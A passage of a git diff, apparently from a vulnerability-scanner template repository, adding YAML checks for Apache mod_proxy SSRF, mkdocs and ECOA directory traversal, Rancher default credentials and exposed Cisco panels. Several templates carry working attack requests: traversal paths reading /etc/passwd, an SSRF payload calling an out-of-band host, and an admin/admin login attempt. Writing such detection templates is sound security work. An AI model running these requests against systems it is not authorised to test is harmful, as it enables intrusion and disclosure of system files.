| 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| stripe | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| sendgrid | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| syslog | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index ec2b8d5aad..e941b1bca2 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 818 | daffainfo | 285 | cves | 821 | info | 733 | http | 2164 | -| lfi | 330 | pikpikcu | 279 | vulnerabilities | 316 | high | 632 | file | 49 | -| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 471 | network | 45 | -| xss | 256 | pdteam | 201 | technologies | 201 | critical | 284 | dns | 12 | -| wordpress | 245 | geeknik | 159 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 137 | | | | | -| rce | 204 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 193 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 170 | princechaddha | 64 | default-logins | 58 | | | | | -| cve2020 | 164 | madrobot | 63 | file | 49 | | | | | +| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | +| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | +| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | +| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | +| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | +| rce | 212 | gy741 | 81 | takeovers | 65 | | | | | +| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 164 | madrobot | 63 | file | 50 | | | | | diff --git a/cves/2019/CVE-2019-6340.yaml b/cves/2019/CVE-2019-6340.yaml index d2b3c1a887..c7691882b1 100644 --- a/cves/2019/CVE-2019-6340.yaml +++ b/cves/2019/CVE-2019-6340.yaml @@ -38,8 +38,9 @@ requests: words: - "uid=" - "gid=" + - "groups=" condition: and part: body - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2021/CVE-2021-40438.yaml b/cves/2021/CVE-2021-40438.yaml new file mode 100644 index 0000000000..8c7d545c22 --- /dev/null +++ b/cves/2021/CVE-2021-40438.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-40438 + +info: + name: Apache <= 2.4.48 - Mod_Proxy SSRF + author: pdteam + severity: critical + description: A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. + reference: + - https://firzen.de/building-a-poc-for-cve-2021-40438 + - https://httpd.apache.org/security/vulnerabilities_24.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-40438 + tags: cve,cve2021,ssrf,apache,mod-proxy,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.00 + cve-id: CVE-2021-40438 + cwe-id: CWE-918 + +requests: + - method: GET + path: + - '{{BaseURL}}/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://{{interactsh-url}}/' + + redirects: true + max-redirects: 2 + matchers: + - type: word + part: interactsh_protocol + words: + - "http" # Confirms HTTP Interaction \ No newline at end of file diff --git a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml new file mode 100644 index 0000000000..2273074039 --- /dev/null +++ b/cves/2021/CVE-2021-40978.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-40978 + +info: + name: mkdocs 1.2.2 built-in dev-server allows directory traversal + author: pikpikcu + severity: high + reference: + - https://github.com/nisdn/CVE-2021-40978 + - https://nvd.nist.gov/vuln/detail/CVE-2021-40978 + tags: cve,cve2021,mkdocs,lfi + description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1." + +requests: + - method: GET + path: + - '{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0:" + part: body + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/ecoa-building-lfi.yaml b/cves/2021/CVE-2021-41291.yaml similarity index 59% rename from vulnerabilities/other/ecoa-building-lfi.yaml rename to cves/2021/CVE-2021-41291.yaml index fcaa63183d..b0e8b161ea 100644 --- a/vulnerabilities/other/ecoa-building-lfi.yaml +++ b/cves/2021/CVE-2021-41291.yaml @@ -1,12 +1,19 @@ -id: ecoa-building-lfi +id: CVE-2021-41291 info: name: ECOA Building Automation System - Directory Traversal Content Disclosure author: gy741 severity: high description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php - tags: ecoa,lfi + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php + - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html + tags: cve,cve2021,ecoa,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-41291 + cwe-id: CWE-22 requests: - raw: @@ -17,5 +24,4 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0:" - part: body + - "root:.*:0:0:" \ No newline at end of file diff --git a/cves/2021/CVE-2021-41293.yaml b/cves/2021/CVE-2021-41293.yaml new file mode 100644 index 0000000000..4a4c48e176 --- /dev/null +++ b/cves/2021/CVE-2021-41293.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-41293 + +info: + name: ECOA Building Automation System - LFD + author: 0x_Akoko + severity: high + description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php + - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html + tags: cve,cve2021,ecoa,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-41293 + cwe-id: CWE-22 + +requests: + - raw: + - | + POST /viewlog.jsp HTTP/1.1 + Host: {{Hostname}} + + yr=2021&mh=6&fname=../../../../../../../../etc/passwd + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml index 430a5c5bb9..473c7adbcb 100644 --- a/cves/2021/CVE-2021-41773.yaml +++ b/cves/2021/CVE-2021-41773.yaml @@ -17,6 +17,8 @@ info: cvss-score: 7.50 cve-id: CVE-2021-41773 cwe-id: CWE-22 + metadata: + shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49 requests: - raw: @@ -42,4 +44,4 @@ requests: - type: word name: RCE words: - - "CVE-2021-41773" \ No newline at end of file + - "CVE-2021-41773" diff --git a/default-logins/rancher/rancher-default-login.yaml b/default-logins/rancher/rancher-default-login.yaml new file mode 100644 index 0000000000..9eadc6d68c --- /dev/null +++ b/default-logins/rancher/rancher-default-login.yaml @@ -0,0 +1,52 @@ +id: rancher-default-login + +info: + name: Rancher Default Login + author: princechaddha + severity: high + description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes. + reference: https://github.com/rancher/rancher + tags: default-login,rancher,kubernetes,devops,cloud + +requests: + - raw: + - | + GET /v3/settings/first-login HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 + + - | + POST /v3-public/localProviders/local?action=login HTTP/1.1 + Host: {{Hostname}} + Cookie: CSRF={{csrf}} + X-Api-Csrf: {{csrf}} + Connection: close + Content-Length: 136 + + {"username":"{{username}}","password":"{{password}}","description":"UI Session","responseType":"cookie","labels":{"ui-session":"true"}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'R_SESS=token' + part: header + + extractors: + - type: regex + name: csrf + group: 1 + internal: true + part: header + regex: + - 'Set-Cookie: CSRF=([a-z0-9]+)' diff --git a/exposed-panels/cisco/cisco-ace-device-manager.yaml b/exposed-panels/cisco/cisco-ace-device-manager.yaml new file mode 100644 index 0000000000..4526ed7920 --- /dev/null +++ b/exposed-panels/cisco/cisco-ace-device-manager.yaml @@ -0,0 +1,25 @@ +id: cisco-ace-device-manager + +info: + name: ACE 4710 Device Manager + author: dhiyaneshDk + severity: info + tags: panel,cisco + metadata: + shodan: 'html:"ACE 4710 Device Manager"' + +requests: + - method: GET + path: + - "{{BaseURL}}/index.vm" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ACE 4710 DM - Login" + + - type: status + status: + - 200 diff --git a/exposed-panels/cisco/cisco-edge-340.yaml b/exposed-panels/cisco/cisco-edge-340.yaml new file mode 100644 index 0000000000..53bf0929b2 --- /dev/null +++ b/exposed-panels/cisco/cisco-edge-340.yaml @@ -0,0 +1,25 @@ +id: cisco-edge-340 + +info: + name: Cisco Edge 340 + author: dhiyaneshDk + severity: info + tags: panel,cisco + metadata: + shodan: 'http.title:"Cisco Edge 340"' + +requests: + - method: GET + path: + - "{{BaseURL}}/auth/?next=%2F" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cisco Edge 340" + + - type: status + status: + - 200 diff --git a/exposed-panels/cisco/cisco-secure-cn.yaml b/exposed-panels/cisco/cisco-secure-cn.yaml new file mode 100644 index 0000000000..034c6857b0 --- /dev/null +++ b/exposed-panels/cisco/cisco-secure-cn.yaml @@ -0,0 +1,25 @@ +id: cisco-secure-cn + +info: + name: Cisco Secure CN + author: dhiyaneshDk + severity: info + tags: panel,cisco + metadata: + shodan: 'http.title:"Cisco Secure CN"' + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cisco Secure CN" + + - type: status + status: + - 200 diff --git a/exposed-panels/cisco/cisco-systems-login.yaml b/exposed-panels/cisco/cisco-systems-login.yaml new file mode 100644 index 0000000000..ab274c92c5 --- /dev/null +++ b/exposed-panels/cisco/cisco-systems-login.yaml @@ -0,0 +1,25 @@ +id: cisco-systems-login + +info: + name: Cisco Systems Login + author: dhiyaneshDk + severity: info + tags: panel,cisco + metadata: + shodan: 'http.title:"Cisco Systems Login"' + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cisco Systems Login" + + - type: status + status: + - 200 diff --git a/exposed-panels/cisco/cisco-telepresence.yaml b/exposed-panels/cisco/cisco-telepresence.yaml new file mode 100644 index 0000000000..16440be020 --- /dev/null +++ b/exposed-panels/cisco/cisco-telepresence.yaml @@ -0,0 +1,25 @@ +id: cisco-telepresence + +info: + name: Cisco Telepresence + author: dhiyaneshDk + severity: info + tags: panel,cisco + metadata: + shodan: 'http.title:"Cisco Telepresence"' + +requests: + - method: GET + path: + - "{{BaseURL}}/login.html" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cisco TelePresence MCU - login:" + + - type: status + status: + - 200 diff --git a/exposed-panels/rancher-panel.yaml b/exposed-panels/rancher-panel.yaml new file mode 100644 index 0000000000..f7eae0a56f --- /dev/null +++ b/exposed-panels/rancher-panel.yaml @@ -0,0 +1,34 @@ +id: rancher-panel + +info: + name: Rancher Login Panel + author: princechaddha + severity: info + description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes. + reference: https://github.com/rancher/rancher + tags: panel,rancher,kubernetes,devops,cloud + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Loading…" + - "global-admin/config/environment" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '' diff --git a/misconfiguration/phpmyadmin-setup.yaml b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml similarity index 100% rename from misconfiguration/phpmyadmin-setup.yaml rename to misconfiguration/phpmyadmin/phpmyadmin-setup.yaml diff --git a/misconfiguration/phpmyadmin-sql.php-server.yaml b/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml similarity index 100% rename from misconfiguration/phpmyadmin-sql.php-server.yaml rename to misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml diff --git a/misconfiguration/phpmyadmin/pma-server-import.yaml b/misconfiguration/phpmyadmin/pma-server-import.yaml new file mode 100644 index 0000000000..8f8c9c25a8 --- /dev/null +++ b/misconfiguration/phpmyadmin/pma-server-import.yaml @@ -0,0 +1,35 @@ +id: pma-server-import + +info: + name: PhpMyAdmin Server Import + author: Cristi vlad (@cristivlad25) + severity: high + description: Finds Unauthenticated PhpMyAdmin Server Import Pages. + tags: phpmyadmin,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}/pma/server_import.php" + - "{{BaseURL}}/phpmyadmin/server_import.php" + - "{{BaseURL}}/phpMyAdmin 2/server_import.php" + - "{{BaseURL}}/db/server_import.php" + - "{{BaseURL}}/server_import.php" + - "{{BaseURL}}/PMA/server_import.php" + - "{{BaseURL}}/admin/server_import.php" + - "{{BaseURL}}/admin/pma/server_import.php" + - "{{BaseURL}}/phpMyAdmin/server_import.php" + - "{{BaseURL}}/admin/phpMyAdmin/server_import.php" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + condition: and + words: + 